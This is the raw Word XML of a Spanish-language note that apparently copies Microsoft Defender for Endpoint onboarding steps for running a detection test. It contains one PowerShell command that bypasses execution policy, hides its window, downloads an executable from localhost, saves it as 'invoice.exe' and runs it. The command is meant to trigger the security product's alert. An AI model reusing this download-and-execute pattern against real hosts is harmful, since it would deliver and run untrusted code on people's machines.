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B5CE" w14:textId="77777777" w:rsidR="00B967B6" w:rsidRPr="00B967B6" w:rsidRDefault="00B967B6" w:rsidP="00B967B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323130"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B967B6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="323130"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Ejecute una prueba de detección</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF6AFC" w14:textId="77777777" w:rsidR="00B967B6" w:rsidRPr="00B967B6" w:rsidRDefault="00B967B6" w:rsidP="00B96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</w:pPr>
      <w:r w:rsidRPr="00B967B6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="323130"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Primera prueba de detección de dispositivo: completada </w:t>
      </w:r>
      <w:r w:rsidRPr="00B967B6">
        <w:rPr>
          <w:rFonts w:ascii="FabricMDL2Icons-5" w:eastAsia="Times New Roman" w:hAnsi="FabricMDL2Icons-5" w:cs="Segoe UI"/>
          <w:color w:val="323130"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00184CDF" w14:textId="77777777" w:rsidR="00B967B6" w:rsidRPr="00B967B6" w:rsidRDefault="00B967B6" w:rsidP="00B96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67B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Para verificar que el dispositivo esté correctamente incorporado y que informe al servicio, ejecute el script de detección en el dispositivo recién incorporado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F49BC49" w14:textId="77777777" w:rsidR="00B967B6" w:rsidRPr="00B967B6" w:rsidRDefault="00B967B6" w:rsidP="00B967B6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67B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Abrir una ventana del símbolo del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC91BFC" w14:textId="77777777" w:rsidR="00B967B6" w:rsidRPr="00B967B6" w:rsidRDefault="00B967B6" w:rsidP="00B967B6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67B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Cuando se le indique, copie y ejecute el siguiente comando. La ventana del símbolo del sistema se cerrará automáticame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DC3E1" w14:textId="5B184100" w:rsidR="0028484F" w:rsidRDefault="00B967B6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B967B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8276D7" w14:textId="4415E7C7" w:rsidR="00AF72C1" w:rsidRDefault="00AF72C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176996AF" w14:textId="48C685CD" w:rsidR="00AF72C1" w:rsidRDefault="00AF72C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0307D53B" w14:textId="08C0AB78" w:rsidR="00AF72C1" w:rsidRPr="00B967B6" w:rsidRDefault="00AF72C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF72C1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://securitycenter.windows.com/preferences2/onboarding</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AF72C1" w:rsidRPr="00B96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2538B" w14:textId="77777777" w:rsidR="004F4B7D" w:rsidRDefault="004F4B7D" w:rsidP="00B967B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0617362E" w14:textId="77777777" w:rsidR="004F4B7D" w:rsidRDefault="004F4B7D" w:rsidP="00B9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bricMDL2Icons-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99031" w14:textId="77777777" w:rsidR="004F4B7D" w:rsidRDefault="004F4B7D" w:rsidP="00B967B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3B272108" w14:textId="77777777" w:rsidR="004F4B7D" w:rsidRDefault="004F4B7D" w:rsidP="00B9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36111"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E7ED2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6"/>
    <w:rsid w:val="0028484F"/>
    <w:rsid w:val="004F4B7D"/>
    <w:rsid w:val="00AF72C1"/>
    <w:rsid w:val="00B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C704E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F4CFAC80-70BF-489D-A8B5-BBEEE566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96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67B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ng-star-inserted">
    <w:name w:val="ng-star-inserted"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B967B6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="wcd-margin-small-top">
    <w:name w:val="wcd-margin-small-top"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B9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Salazar Huelgos</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cristian Alejandro Salazar Huelgos</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-11T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-11T15:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>